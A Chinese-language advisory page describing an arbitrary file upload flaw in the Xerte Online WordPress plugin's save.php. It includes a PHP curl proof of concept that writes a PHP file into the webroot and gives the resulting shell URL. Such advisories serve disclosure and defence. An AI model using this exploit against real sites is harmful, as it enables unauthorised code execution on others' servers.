好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

WordPress Xerte Online插件'save.php'任意文件上

 受影响系统:

描述:

 Xerte Online for WordPress是基于服务器的内容作者的工具集。

 

Xerte Online for WordPress内存在安全 漏洞 ,wp-content/plugins/xerte-online/xertefiles/save.php允许上传带有任意扩展名的文件到webroot内的文件夹,通过提交恶意的 PHP 脚本,可导致任意PHP代码执行。

 

 

 

测试方法:

 

 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

Exploit :

 

PostShell.php

<?php

 

$code = "<? phpinfo(); ?>"; 

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");

curl_setopt($ch, CURLOPT_POST, true);   

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",

        'filedata'=>"$code"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

 

?>

 

 

Shell Access :

http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php

 

 

# Site : 1337day.com Inj3ct0r Exploit Database

 

建议:

厂商补丁:

 

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://wordpress.org/extend/plugins/xerte-online/

查看更多关于WordPress Xerte Online插件'save.php'任意文件上的详细内容...

  阅读:45次